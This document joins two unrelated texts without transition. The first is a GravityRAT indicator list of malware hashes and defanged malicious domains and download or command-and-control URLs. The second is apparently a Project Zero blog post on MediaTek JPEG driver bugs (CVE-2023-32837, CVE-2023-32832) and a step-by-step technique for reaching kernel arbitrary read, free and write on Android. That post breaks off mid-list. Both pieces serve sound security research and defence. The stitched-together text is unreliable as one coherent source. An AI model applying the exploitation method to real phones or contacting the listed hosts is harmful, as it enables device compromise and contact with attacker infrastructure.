 

GravityRAT Android 

36851d1da9b2f35da92d70d4c88ea1675f1059d68fafd3abb1099e075512b45e 
4ebdfa738ef74945f6165e337050889dfa0aad61115b738672bbeda648a59dab 
1382997d3a5bb9bdbb9d41bb84c916784591c7cdae68305c3177f327d8a63b71 
c00cedd6579e01187cd256736b8a506c168c6770776475e8327631df2181fae2 
380df073825aca1e2fdbea379431c2f4571a8c7d9369e207a31d2479fbc7be88

  

GravityAdmin 

63a76ca25a5e1e1cf6f0ca8d32ce14980736195e4e2990682b3294b125d241cf 
69414a0ca1de6b2ab7b504a507d35c859fc5a1b8e0b3cf0c6a8948b2f652cbe9 
04e216f4780b6292ccc836fa0481607c62abb244f6a2eedc21c4a822bcf6d79f

 

Network IOCs 

 androidmetricsasia[.]com 
dl01[.]mozillasecurity[.]com 
officelibraries[.]com 
javacdnlib[.]com 
windowsupdatecloud[.]com 
webbucket[.]co[.]uk 
craftwithme[.]uk 
sexyber[.]net 
rockamore[.]co[.]uk 
androidsdkstream[.]com 
playstoreapi[.]net 
sdklibraries[.]com 
cvscout[.]uk 
zclouddrive[.]com 
jdklibraries[.]com 
cloudieapp[.]net 
androidadbserver[.]com 
androidwebkit[.]com 
teraspace[.]co[.]in

  

hxxps[://]zclouddrive[.]com/downloads/CloudDrive_Setup_1[.]0[.]1[.]exe 
hxxps[://]www[.]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]cloudieapp[.]net/cloudie[.]zip 
hxxps[://]sni1[.]androidmetricsasia[.]com/voilet/8a99d28c[.]php 
hxxps[://]dev[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]adb[.]androidadbserver[.]com/jurassic/6c67d428[.]php 
hxxps[://]library[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]ux[.]androidwebkit[.]com/kangaroo/8a99d28c[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]sni1[.]androidmetricsasia[.]com/voilet/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]moon[.]playstoreapi[.]net/indigo/8a99d28c[.]php 
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php  
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php  
hxxps[://]cloudinfinity-d4049-default-rtdb[.]firebaseio[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/ 
hxxps[://]dl01[.]mozillasecurity[.]com/Sier/resauth[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/resauth[.]php/ 
hxxps[://]tl37[.]officelibraries[.]com/Sier/resauth[.]php 
hxxps[://]tl37[.]officelibraries[.]com/resauth[.]php/ 
hxxps[://]jun[.]javacdnlib[.]com/Quebec/5be977ac[.]php 
hxxps[://]dl01[.]mozillasecurity[.]com/resauth[.]php/ 
hxxps[://]dl01[.]mozillasecurity[.]com/MicrosoftUpdates/6efbb147[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MicrosoftUpdates/741bbfe6[.]php 
hxxps[://]tl37[.]officelibraries[.]com/MsWordUpdates/c47d1870[.]php 
hxxps[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]tl37[.]officelibraries[.]com/opex/13942BA7[.]php 
hxxp[://]dl01[.]windowsupdatecloud[.]com/opex/7ab24931[.]php 
hxxps[://]tl37[.]officelibraries[.]com/opex/13942BA7[.]php 
hxxps[://]download[.]rockamore[.]co[.]uk/m2c/m_client[.]php 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/ 
hxxps[://]api1[.]androidsdkstream[.]com/foxtrot/61c10953[.]php 
hxxps[://]jupiter[.]playstoreapi[.]net/RB/e7a18a38[.]php 
hxxps[://]sdk2[.]sdklibraries[.]com/golf/c6cf642b[.]php 
hxxps[://]jre[.]jdklibraries[.]com/hotriculture/671e00eb[.]php 
hxxps://hxxp[://]api1[.]androidsdkstream[.]com/foxtrot//DataX/ 
hxxps[://]download[.]cvscout[.]uk/cvscout/cvstyler_client[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/strong_client[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/strong_client[.]php 
hxxps[://]download[.]sexyber[.]net/sexyber/sexyberC[.]php 
hxxps[://]download[.]webbucket[.]co[.]uk/A0B74607[.]php 
hxxps[://]zclouddrive[.]com/system/546F9A[.]php 
hxxps[://]download[.]cvscout[.]uk/cvscout/ 
hxxps[://]download[.]cvscout[.]uk/c9a5e83c[.]php 
hxxps[://]zclouddrive[.]com/downloads/CloudDrive_Setup_1[.]0[.]1[.]exe 
hxxps[://]zclouddrive[.]com/system/clouddrive/ 
hxxps[://]www[.]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]sexyber[.]net/downloads/7ddf32e17a6ac5ce04a8ecbf782ca509/Sexyber-1[.]0[.]0[.]zip 
hxxps[://]download[.]sexyber[.]net/0fb1e3a0[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/d26873c6[.]php 
hxxps[://]download[.]teraspace[.]co[.]in/teraspace/ 
hxxps[://]download[.]teraspace[.]co[.]in/78181D14[.]php 
hxxps[://]www[.]craftwithme[.]uk/cwmb/craftwithme/ 
hxxps[://]download[.]webbucket[.]co[.]uk/webbucket/

Yesterday — 13 June 2024Main stream

Driving forward in Android drivers

13 June 2024 at 18:03

Posted by Seth Jenkins, Google Project Zero

Introduction

Android's open-source ecosystem has led to an incredible diversity of manufacturers and vendors developing software that runs on a broad variety of hardware. This hardware requires supporting drivers, meaning that many different codebases carry the potential to compromise a significant segment of Android phones. There are recent public examples of third-party drivers containing serious vulnerabilities that are exploited on Android. While there exists a well-established body of public (and In-the-Wild) security research on Android GPU drivers, other chipset components may not be as frequently audited so this research sought to explore those drivers in greater detail.

Driver Enumeration: Not as Easy as it Looks

This research focused on three Android devices (chipset manufacturers in parentheses):

- Google Pixel 7 (Tensor)

- Xiaomi 11T (MediaTek)

- Asus ROG 6D (MediaTek)

In order to perform driver research on these devices I first had to find all of the kernel drivers that were accessible from an unprivileged context on each device; a task complicated by the non-uniformity of kernel drivers (and their permissions structures) across different devices even within the same chipset manufacturer. There are several different methodologies for discovering these drivers. The most straightforward technique is to search the associated filesystems looking for exposed driver device files. These files serve as the primary method by which userland can interact with the driver. Normally the “file” is open’d by a userland process, which then uses a combination of read, write, ioctl, or even mmap to interact with the driver. The driver then “translates” those interactions into manipulations of the underlying hardware device sending the output of that device back to userland as warranted. Effectively all drivers expose their interfaces through the ProcFS or DevFS filesystems, so I focused on the /proc and /dev directories while searching for viable attack surfaces. Theoretically, evaluating all the userland accessible drivers should be as simple as calling find /dev or find /proc, attempting to open every file discovered, and logging which open attempts were successful.

However, there is one major roadblock that prevents this approach from being comprehensive - permissions! SELinux and traditional Linux Discretionary Access Control policies can prevent simple filesystem enumeration from discovering all of the accessible device drivers associated on the filesystem. For example, the untrusted_app SELinux context has search permissions on the device SELinux context for directories, but is not allowed to directly open the directory itself:

sepolicy shows search permission on the "device" SELinux context

This search permission (rather counterintuitively) does not allow the source context to list the contents of directories that have this SELinux target context. Instead, it simply allows such a directory to be in the ancestor directories of the file path that the source context attempts to open. In practice, this means that untrusted_app is allowed to open e.g. /dev/mali0 but is usually not allowed to open /dev itself:

untrusted_app is unable to list /dev but can open files within it like /dev/mali0

In the case of /dev, the shell context is allowed to open and list the contents of /dev. That means that by first enumerating the /dev directory from the shell context, then attempting to open all discovered files from the untrusted_app context, a security researcher can understand what drivers are and are not accessible from an app context in the /dev directory. However, there are cases where certain directories are simply not listable from a debugging-accessible non-root context, particularly in /proc. One option to enumerate all these directories would be to root the phone, however, this is not always easily achievable.

A strategy I found helpful in this regard was to examine publicly released kernel source code for the phone model or for similar phone models. The location of this source code varies significantly from manufacturer to manufacturer, but the source code is usually either hosted on Github or via the manufacturer website. Device drivers create files in /proc primarily via the proc_create() and proc_mkdir() function calls. A real-world example of this would be:

        parent = proc_mkdir("perfmgr", NULL);

        perfmgr_root = parent;

        pe = proc_create("perf_ioctl", 0664, parent, &Fops);

        ...

        pe = proc_create("eara_ioctl", 0664, parent, &eara_Fops);

        ...

        pe = proc_create("eas_ioctl", 0664, parent, &eas_Fops);

        ...

        pe = proc_create("xgff_ioctl", 0664, parent, &xgff_Fops);

        ...

Although these files cannot be directly enumerated, they do exist and are accessible from an untrusted context.

/proc/perfmgr directory contents cannot be listed with ls, but can be open'd

It would have otherwise required rooting the phone to discover this driver without analyzing the kernel source code.

Another useful resource is the SELinux policy itself. Userland interacts with the drivers via a fairly typical set of VFS operations. This means that the SELinux policy must encapsulate the necessary permissions to perform those operations. This means that the SELinux policy generally reflects what the developers intend to be accessible from an untrusted context. Analysis of the policy can lead to the discovery of certain oddities and idiosyncrasies in the accessibility of certain drivers. For example, occasionally a file may not be directly openable via the filesystem, but there may be some alternative method by which an app can ask another more privileged process to open the file on its behalf and hand the associated fd back, after which the app is allowed to read/write/ioctl to the fd itself. One example of this behavior would be the EdgeTPU device on the Pixel 7:

Additional research suggests that untrusted_app can ask a privileged process for access to the EdgeTPU driver fd itself if it lands on an allowlist of certain applications.

The performed surveys strongly imply that the GPU driver is the most consistently accessible driver from an untrusted application, which is expected. On the Google Pixel 7, I did not find much else that was accessible from an entirely unprivileged context. Nevertheless, inspired by previous similar efforts on hardware like Samsung’s NPU, I performed research on the EdgeTPU driver - Google’s tensor processing unit for doing ML related tasks on the Pixel series of devices. This resulted in the discovery of one significant issue - a race condition when registering memory with the EdgeTPU memory while vma’s are concurrently getting modified.

Unlike the Pixel 7, the MediaTek chipset phones (Asus ROG 6D and Xiaomi 11T) contained several different drivers that could be accessed from unprivileged userland:

  • /proc/ged
  • /proc/mtk_jpeg
  • /proc/perfmgr/[eara_ioctl,eas_ioctl,perf_ioctl,xgff_ioctl]

These drivers represent significantly more interesting and complex attack surfaces than what was available on the Pixel 7 device. The ged driver contained numerous interesting and valuable exploitation primitives that we’ll discuss in detail a bit later. While the perfmgr driver presented several attack surfaces, I wasn’t able to find any security-relevant bugs. The mtk_jpeg driver however, yielded significant fruit that deserves a closer look.

MediaTek JPEG Decoding Accelerator

The mtk_jpeg driver manages specialized hardware on MediaTek devices to perform jpeg decoding acceleration. Linux kernel documentation notes that “Mediatek JPEG Decoder is the JPEG decode hardware present in Mediatek SoCs”. More relevantly, from an attacker's point of view, this driver can be accessed (at least on the phones assessed) from the untrusted_app context (although curiously, it cannot be accessed from an unprivileged adb debugging context). This JPEG decoding accelerator and its associated driver is present on both the Xiaomi 11T and the Asus ROG 6D. However, based on open-source codebases for these different devices' kernels, it appears MediaTek is actively maintaining several different trees for this driver, likely based on the associated kernel version, and these two devices use separate trees.

I found two vulnerabilities in this driver. CVE-2023-32837 was a textbook OOB read/write in an array of structs. Various different members of the struct were accessed and modified, creating several different possibilities for exploitation, but also making them significantly more challenging. Interestingly, MediaTek partially fixed this bug in July 2021, although the exact date this patch went out to OEMs is unclear. From the commit message, it’s clear that MediaTek detected this issue with the Coverity static analysis tool, but it appears unlikely that the security impact was identified. Regardless, while the issue was fixed in some of the MediaTek kernel trees, it went unpatched in other versions of that same driver. This meant that while the Asus ROG 6D (running kernel 5.10) had received the patch for this vulnerability, the (otherwise fully patched and security supported) Xiaomi 11T (running 4.14) had not.

Some background knowledge on how the jpeg driver works eases discussion of the other issue, CVE-2023-32832. The accelerator hardware has two separate “cores” that can perform JPEG decoding. When a process requests JPEG decoding work to be performed, it calls the ioctl JPEG_DEC_IOCTL_HYBRID_START, and the kernel decides which decoding core will perform that work inside of jpeg_drv_hybrid_dec_lock()(output has been colorized to ease following along):

static int jpeg_drv_hybrid_dec_lock(int *hwid)

{

        int retValue = 0;

        int id = 0;

        ...

        mutex_lock(&jpeg_hybrid_dec_lock);

        for (id = 0; id < HW_CORE_NUMBER; id++) {

                if (dec_hwlocked[id]) {

                        JPEG_LOG(1, "jpeg dec HW core %d is busy", id);

                        continue;

                } else {

                        *hwid = id;

                        dec_hwlocked[id] = true;

                        JPEG_LOG(1, "jpeg dec get %d HW core", id);

                        _jpeg_hybrid_dec_int_status[id] = 0;

                        jpeg_drv_hybrid_dec_power_on(id);

                        enable_irq(gJpegqDev.hybriddecIrqId[id]);

                        break;

                }

        }

        mutex_unlock(&jpeg_hybrid_dec_lock);

        if (id == HW_CORE_NUMBER) {

                JPEG_LOG(1, "jpeg dec HW core all busy");

                *hwid = -1;

                retValue = -EBUSY;

        }

        return retValue;

}

The array dec_hwlocked contains a boolean element for each core, with that element being set to true for locked cores, and false for unlocked cores. This array is also protected with a mutex to try and prevent concurrent calls to jpeg_drv_hybrid_dec_lock, or jpeg_drv_hybrid_dec_unlock from racing with each other. After locking the core, jpeg_drv_hybrid_dec_start sets up the data-structures to be utilized for the decoding operation:

switch (cmd) {

        case JPEG_DEC_IOCTL_HYBRID_START:

                if (copy_from_user(

                        &taskParams, (void *)arg,

                        sizeof(struct JPEG_DEC_DRV_HYBRID_TASK))) {

                        return -EFAULT;

                }

                ...

                if (jpeg_drv_hybrid_dec_lock(&hwid) == 0) {

                        *pStatus = JPEG_DEC_PROCESS;

                } else {

                        JPEG_LOG(1, "jpeg_drv_hybrid_dec_lock failed (hw busy)");

                        return -EBUSY;

                }

                if (jpeg_drv_hybrid_dec_start(taskParams.data, hwid, &index_buf_fd) == 0) {

                        ...

                } else {

                        JPEG_LOG(0, "jpeg_drv_dec_hybrid_start failed");

                        jpeg_drv_hybrid_dec_unlock(hwid);

                        return -EFAULT;

                }

                break;

...

}

static int jpeg_drv_hybrid_dec_start(unsigned int data[],unsigned int id,int *index_buf_fd)

{

        u64 ibuf_iova, obuf_iova;

        int ret;

        void *ptr;

        unsigned int node_id;

        JPEG_LOG(1, "+ id:%d", id);

        ret = 0;

        ibuf_iova = 0;

        obuf_iova = 0;

        node_id = id / 2;

        bufInfo[id].o_dbuf = jpg_dmabuf_alloc(data[20], 128, 0);

        bufInfo[id].o_attach = NULL;

        bufInfo[id].o_sgt = NULL;

        bufInfo[id].i_dbuf = jpg_dmabuf_get(data[7]);

        bufInfo[id].i_attach = NULL;

        bufInfo[id].i_sgt = NULL;

        if (!bufInfo[id].o_dbuf) {

            JPEG_LOG(0, "o_dbuf alloc failed");

                return -1;

        }

        if (!bufInfo[id].i_dbuf) {

            JPEG_LOG(0, "i_dbuf null error");

                return -1;

        }

        ret = jpg_dmabuf_get_iova(bufInfo[id].o_dbuf, &obuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].o_attach, &bufInfo[id].o_sgt);

        JPEG_LOG(1, "obuf_iova:0x%llx lsb:0x%lx msb:0x%lx", obuf_iova,

                (unsigned long)(unsigned char*)obuf_iova,

                (unsigned long)(unsigned char*)(obuf_iova>>32));

        ptr = jpg_dmabuf_vmap(bufInfo[id].o_dbuf);

        if (ptr != NULL && data[20] > 0)

                memset(ptr, 0, data[20]);

        jpg_dmabuf_vunmap(bufInfo[id].o_dbuf, ptr);

        jpg_get_dmabuf(bufInfo[id].o_dbuf);

        // get obuf for adding reference count, avoid early release in userspace.

        *index_buf_fd = jpg_dmabuf_fd(bufInfo[id].o_dbuf);

        ret = jpg_dmabuf_get_iova(bufInfo[id].i_dbuf, &ibuf_iova, gJpegqDev.pDev[node_id], &bufInfo[id].i_attach, &bufInfo[id].i_sgt);

        JPEG_LOG(1, "ibuf_iova 0x%llx lsb:0x%lx msb:0x%lx", ibuf_iova,

                (unsigned long)(unsigned char*)ibuf_iova,

                (unsigned long)(unsigned char*)(ibuf_iova>>32));

        if (ret != 0) {

                JPEG_LOG(0, "get iova fail i:0x%llx o:0x%llx", ibuf_iova, obuf_iova);

                return ret;

        }

        ...

        return ret;

}

Finally, utilizing an ioctl call to JPEG_DEC_IOCTL_HYBRID_WAIT (which calls jpeg_drv_hybrid_dec_unlock), resources associated with the core are freed, and the core is released back to be used in future operations.

case JPEG_DEC_IOCTL_HYBRID_WAIT:

                ...

                if (copy_from_user(

                        &pnsParmas, (void *)arg,

                        sizeof(struct JPEG_DEC_DRV_HYBRID_P_N_S))) {

                        JPEG_LOG(0, "Copy from user error");

                        return -EFAULT;

                }

                /* set timeout */

                timeout_jiff = msecs_to_jiffies(3000);

                JPEG_LOG(1, "JPEG Hybrid Decoder Wait Resume Time: %ld",

                                timeout_jiff);

                hwid = pnsParmas.hwid;

                if (hwid < 0 || hwid >= HW_CORE_NUMBER) { //In other versions of the driver, this >= check was omitted, which led to several different OOB accesses later aka CVE-2023-32837

                        JPEG_LOG(0, "get hybrid dec id failed");

                        return -EFAULT;

                }

                if (!dec_hwlocked[hwid]) {

                        JPEG_LOG(0, "wait on unlock core %d\n", hwid);

                        return -EFAULT;

                }

                if (jpeg_isr_hybrid_dec_lisr(hwid) < 0) {

                        long ret = 0;

                        int waitfailcnt = 0;

                        do {

                                ret = wait_event_interruptible_timeout(

                                        hybrid_dec_wait_queue[hwid],

                                        _jpeg_hybrid_dec_int_status[hwid],

                                        timeout_jiff);

                                ...

                                if (ret < 0) {

                                        waitfailcnt++;

                                        usleep_range(10000, 20000);

                                }

                        } while (ret < 0 && waitfailcnt < 500);

                }

                ...

                if (copy_to_user(pnsParmas.progress_n_status, &progress_n_status,                                sizeof(int))) {

                        return -EFAULT;

                }

                ...

                jpeg_drv_hybrid_dec_unlock(hwid);

                break;

                ...

}

...

static void jpeg_drv_hybrid_dec_unlock(unsigned int hwid)

{

        mutex_lock(&jpeg_hybrid_dec_lock);

        if (!dec_hwlocked[hwid]) {

                JPEG_LOG(0, "try to unlock a free core %d", hwid);

        } else {

                dec_hwlocked[hwid] = false;

                JPEG_LOG(1, "jpeg dec HW core %d is unlocked", hwid);

                jpeg_drv_hybrid_dec_power_off(hwid);

                disable_irq(gJpegqDev.hybriddecIrqId[hwid]);

                jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf,

                        bufInfo[hwid].i_attach,

                        bufInfo[hwid].i_sgt);

                jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf,

                        bufInfo[hwid].o_attach,

                        bufInfo[hwid].o_sgt);

                jpg_dmabuf_put(bufInfo[hwid].i_dbuf);

                jpg_dmabuf_put(bufInfo[hwid].o_dbuf);

                // we manually add 1 ref count, need to put it.

        }

        mutex_unlock(&jpeg_hybrid_dec_lock);

}

jpeg_drv_hybrid_dec_unlock is also called in the event that jpeg_drv_hybrid_dec_start fails.

While the jpeg_hybrid_dec_lock mutex protects the direct core locking and unlocking, it does not protect the body of the jpeg_drv_hybrid_dec_start function. This means that while there cannot be concurrent calls to both jpeg_drv_hybrid_dec_lock and jpeg_drv_hybrid_dec_unlock, there can be concurrent calls to jpeg_drv_hybrid_dec_start and jpeg_drv_hybrid_dec_unlock which in practice is just as bad, as these two functions racily access the same global data structure bufInfo.

One small added complication for this bug is that in order to reach the jpeg_drv_hybrid_dec_unlock in the JPEG_DEC_IOCTL_HYBRID_WAIT call, the core must be locked before the timeout due to a check to ensure that the core is locked before attempting to wait on the core.

An example of this race in practice with two processes A and B would be (colorized respective to the above code):

Process A:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_START, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start

Process B:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_WAIT, which confirms that core 0 is locked then begins a 3 second wait for the core to send an interrupt denoting completion of the decoding request.

Process A:

Fails jpeg_drv_hybrid_dec_start, (after initializing some of the data structures), calls jpeg_drv_hybrid_dec_unlock on core 0 freeing any allocated resources, and returns to userland.

[wait ~3 seconds]

Process A:

Calls ioctl JPEG_DEC_IOCTL_HYBRID_START, which locks core 0 with jpeg_drv_hybrid_dec_lock and enters jpeg_drv_hybrid_dec_start

Process B:
3 second wait times out, and the JPEG_DEC_IOCTL_HYBRID_WAIT ioctl call unlocks core 0 with jpeg_drv_hybrid_dec_unlock.

[Process A and B are now concurrently initializing and freeing the same data-structures]

This can lead to a variety of use-after-free or double free conditions, depending on how process A and B race.

The Journey to root

The next step was to try to exploit these issues. My first attempt targeted the OOB write issue, CVE-2023-32837. I was able to develop the primitive from an uncontrolled OOB read/write in the kernel .data region into a racy write of null bytes at a predetermined offset in a kernel task stack used by an attacker-controlled process. At this point it was possible to overwrite a kernel stack entry with nulls during any syscall which felt to me like enough flexibility to create a full exploit. However, despite my best efforts (including the creation of a tool to find where in an arbitrary backtrace the write would occur), I was unable to discover a technique to create a better primitive from this write.

Failing that effort, I decided to take a look at the other issue in the same driver CVE-2023-32832. During the freeing step that races with jpeg_drv_hybrid_dec_start, jpeg_drv_hybrid_dec_unlock drops access to four separate resources:

jpg_dmabuf_free_iova(bufInfo[hwid].i_dbuf, bufInfo[hwid].i_attach, bufInfo[hwid].i_sgt); //The input buffer virtual address mapping in the core

jpg_dmabuf_free_iova(bufInfo[hwid].o_dbuf, bufInfo[hwid].o_attach, bufInfo[hwid].o_sgt); //The output buffer virtual address mapping in the core

jpg_dmabuf_put(bufInfo[hwid].i_dbuf); //The input buffer file's refcount is decremented. This buffer was previously allocated by the attacker and is associated with a file descriptor.

jpg_dmabuf_put(bufInfo[hwid].o_dbuf); //The output buffer file's refcount is decremented. This buffer was previously allocated during jpeg_drv_hybrid_dec_start.

One critical behavior of the driver that enhanced exploitability was that although jpeg_drv_hybrid_dec_unlock properly drops the refcounts of i_dbuf and o_dbuf, it does not reinitialize those entries in the bufInfo global array to NULL. As it relates to the race, this means that if Process B’s racy jpeg_drv_hybrid_dec_unlock occurs before Process A’s second jpeg_drv_hybrid_dec_start reinitializes i_dbuf and o_dbuf, an extra refcount of i_dbuf and o_dbuf will be released. Since i_dbuf and o_dbuf are struct file*’s, this can lead directly to a struct file UAF. As the i_dbuf struct file comes directly from a dmabuf file descriptor passed into jpeg_drv_hybrid_dec_start, this leads to a dangling file descriptor with the struct file freed from underneath it. This is undoubtedly an exploitable bug.

There are several different techniques for exploiting a dangling file descriptor. One widely used strategy is causing the backing slab page of the struct file to be freed and returned back to the page allocator, then reallocating that page with pipe buffer data pages in order to gain attacker control over the memory used for the struct file. Another well-known strategy would be to utilize the cross-cache technique to reallocate the memory as a different kind of kmalloc slab/object. However, in the future both of these techniques may be remediated if the SLAB_VIRTUAL mitigation comes into effect in the mainline Linux kernel. In the interest of exploring the future of Android kernel hacking, I sought a novel exploitation technique which did not involve cross-cache or slab-cache->page allocator heap shaping techniques.

Some Other Novel Exploitation Technique

One of the most common UAF exploit techniques involves reallocating the first-order freed object with a new object of a different type, creating a type-confusion condition which leads to an improved memory corruption primitive. However the only type of object that can be allocated in a page designated for the struct file cache is the struct file type, so the options for creating a type confusion memory corruption condition using first-order object reclamation are limited. However, just because an object is freed does not preclude it from being usable under limited circumstances. When the kernel inserts an object onto a freelist, this clobbers the middle of the object. The rest of the object however, remains in whatever state it was in at the moment it was freed, including pointers and any other member variables. Those stale pointers can (and in practice often do) point to other freed objects which may be allocated from a different slab cache entirely, potentially including the generic kmalloc slab-caches. Note that under the C-ism where pointers are set to NULL after freeing, these stale pointers wouldn’t exist. However as the memory containing the pointer is getting freed anyway, setting these pointers to NULL is often seen as unnecessarily conservative (and in fact, C compilers often throw away writes to objects that are about to be freed).

By continuing to use this freed first-order object, we can implicitly access freed second-order child objects. By reclaiming those objects, we can recreate a type-confusion memory corruption primitive, taking advantage of how the methods called on the first-order freed object implicitly access the second-order child object. Let’s see how we can apply this to our specific scenario.

Linux kernel struct files may represent many different types of files depending on the kind of opened file such as ext4 files, procfs files, or even MediaTek JPEG decoding driver files. In order to represent all of these different types while also maintaining some commonality of structure for the universally needed members of an opened file, struct file contains a private_data member which references any type-specific data needed.

As mentioned previously, the UAF’d struct file in this case is a dmabuf file. This means the private_data pointer points to a struct dma_buf object. The dma_buf object lifetime is implicitly tied to the lifetime of the associated dmabuf file struct. When the dmabuf struct file is freed, the dma_buf object is freed too. However unlike the struct file, dma_buf objects are allocated from the generic kmalloc slab caches. This means that the dma_buf can be reclaimed with a different type object that comes from the same generic kmalloc slab cache.

After a hypothetical reclamation by a new object, this new object can still be UAF referenced as a dma_buf through the freed but still very usable dmabuf struct file that itself is referenced via the dangling file descriptor! Thus we arrive at the following strategy:

  1. Free the file by using our race condition bug to drop an extra reference on i_dbuf (which also frees the dma_buf), leaving a dangling fd pointing to a freed struct file which still has a stale pointer to a freed dma_buf
  2. Reclaim the dma_buf WITHOUT reclaiming the struct file
  3. Call dma_buf operations on the dangling fd

You may have astutely noted by this point that this strategy relies on a freed object (that is, the struct file) not being reclaimed as another object by the heap allocator. This is absolutely correct, and one would expect that in an exploit where exceptional reliability is a priority, it may be necessary to perform some heap shaping in order to bury this freed struct file deeply in the allocator freelists. In practice (and in my exploit), the freed struct file will rarely be on the percpu active slab so it’s unlikely to get reclaimed immediately, and my exploit generally runs fast enough that it doesn’t matter.

At this point we now need to determine what object to use in order to reclaim the freed dma_buf, as well as what operation to call on the freed dma_buf file/object to develop a stronger primitive. I ended up finding the solutions to both of these problems in the GED driver.

The GED driver

The GED (GPU Extension Device) driver is a MediaTek-specific interface that provides userland with several supplementary GPU features, primarily for tuning purposes. Two of its “features” appeared particularly valuable. Feature number one, GED GE Buffers, presented a truly remarkable heap spray and reclamation primitive. This feature provides several requisite characteristics of a suitable heap spray primitive:

  • Allocates buffers of a controlled size without causing undue noise for the rest of the heap.
  • Buffer data is fully attacker controlled, with no uncontrolled header at the beginning
  • Buffers can be freed at any time.

One standout characteristic that elevates this heap spray primitive above many of its peers however, is that even once allocated, the attacker can read and write to these buffers at will while keeping the buffer allocated. This is about as powerful a heap spray primitive as one could imagine. By reclaiming the UAF’d dma_buf struct with a GED GE buffer, we gain fully deterministic read/write over the dma_buf struct, including any pointers contained therein.

Graph showing the overlapping object hierarchy of a UAF'd dma buffer struct file and a GE file

Feature number two is an alternate codepath to the same functionality as the DMA_BUF_SET_NAME ioctl, which is (very sensibly) used to set the name of a dma_buf. The biggest difference between these paths is the GED codepath’s lack of SELinux inode checks on the underlying dma_buf fd. These inode checks would normally crash the kernel when they run on a freed struct file - however because of the GED codepath, we can skip this inode check, and change the dma_buf’s name despite running on a freed dma_buf file! Normally, this code would free the pointer to the previous name within the dma_buf struct and allocate a new buffer for the name string. However, because of GED GE buffers we are able to control the entirety of the dma_buf struct. By combining these primitives, we can kfree an arbitrary pointer before setting a new name string.

long mtk_dma_buf_set_name(struct dma_buf *dmabuf, const char *buf)

{

        char *name = kstrndup(buf, DMA_BUF_NAME_LEN, GFP_KERNEL);

        ...

        kfree(dmabuf->name); //dmabuf is attacker controlled

        dmabuf->name = name; //the name pointer is written to attacker controlled memory

        ...

}

Achieving arbitrary read

Innocuous dmabuf file operations become potent primitives now that we have precise control of the dma_buf struct. For example, this is the code backing /proc/pid/fdinfo/n for dmabuf files:

static void dma_buf_show_fdinfo(struct seq_file *m, struct file *file)

{

        struct dma_buf *dmabuf = file->private_data;

        seq_printf(m, "size:\t%zu\n", dmabuf->size);

        /* Don't count the temporary reference taken inside procfs seq_show */

        seq_printf(m, "count:\t%ld\n", file_count(dmabuf->file) - 1);

        seq_printf(m, "exp_name:\t%s\n", dmabuf->exp_name);

        spin_lock(&dmabuf->name_lock);

        if (dmabuf->name)

                seq_printf(m, "name:\t%s\n", dmabuf->name);

        spin_unlock(&dmabuf->name_lock);

}

There are several opportunities in this function for achieving arbitrary read, but the cleanest one is the file_count() call, which will dereference the passed pointer + a hardcoded offset, and print the read 8 byte value as a signed long. Normally in the context of this C function, file == ((struct dma_buf*) file->private_data)->file , but since we control the dma_buf struct that isn’t necessarily the case.

Achieving arbitrary write

At this point we have three powerful primitives:

  • Read/write UAF’d dma_buf struct memory (via GED GE buffers)
  • Arbitrary read (via dma_buf_show_fdinfo)
  • Arbitrary free (via ged_dmabuf_set_name)

Graph showing our arbitrary read and arbitrary free primitives via the UAF'd dma buffer

There are many potential strategies that use these primitives to achieve an arbitrary write primitive. The technique I chose was to type-confuse a GE buffer with a GE buffer array. GED GE Buffers are tracked through a hierarchy of structs and arrays. A GE file’s private_data member points to an array of GE buffer pointers like so:

Graph showing the object hierarchy of GE files within an fdtable down to GE buffers

I achieve this type-confusion by using the arbitrary-free primitive developed previously to free a GE buffer array, then reclaiming that array with a GE buffer from a second GE file. Since the GE buffer array (and GE buffers as well) come from generic kmalloc caches, the only requirement for this reclamation is allocating GE buffers that are the same size as a GE buffer array. If two GE files are referencing the same memory, one (GE file A) as a GE buffer, and one (GE file B) as a GE buffer array, I can modify the contents of a GE buffer array at will.

Graph showing the overlapping object hierarchy of two GE files where one file's GE buffer is another file's GE buffer array

Then performing an arbitrary write to a virtual address X will be as simple as using GE file A’s GE buffer to change the contents of the array to point to the virtual address X, then writing to that address using GE file B which now thinks virtual address X is a GE buffer!

This technique hinges on being able to use the arbitrary free primitive to free a GE buffer array. To do that, it’s necessary to find the virtual address of a GE buffer array first. Since we have an arbitrary read primitive already, any parent struct/object/array of a GE buffer array will be enough to find the virtual address of a GE buffer array itself. The hierarchy is as follows:

  1. GE arrays are referenced by a GE file
  2. GE files are referenced by an fdtable as a file descriptor
  3. An fdtable is referenced by a task struct
  4. Task structs are referenced as part of the task list with the root node being the init task in the kernel image

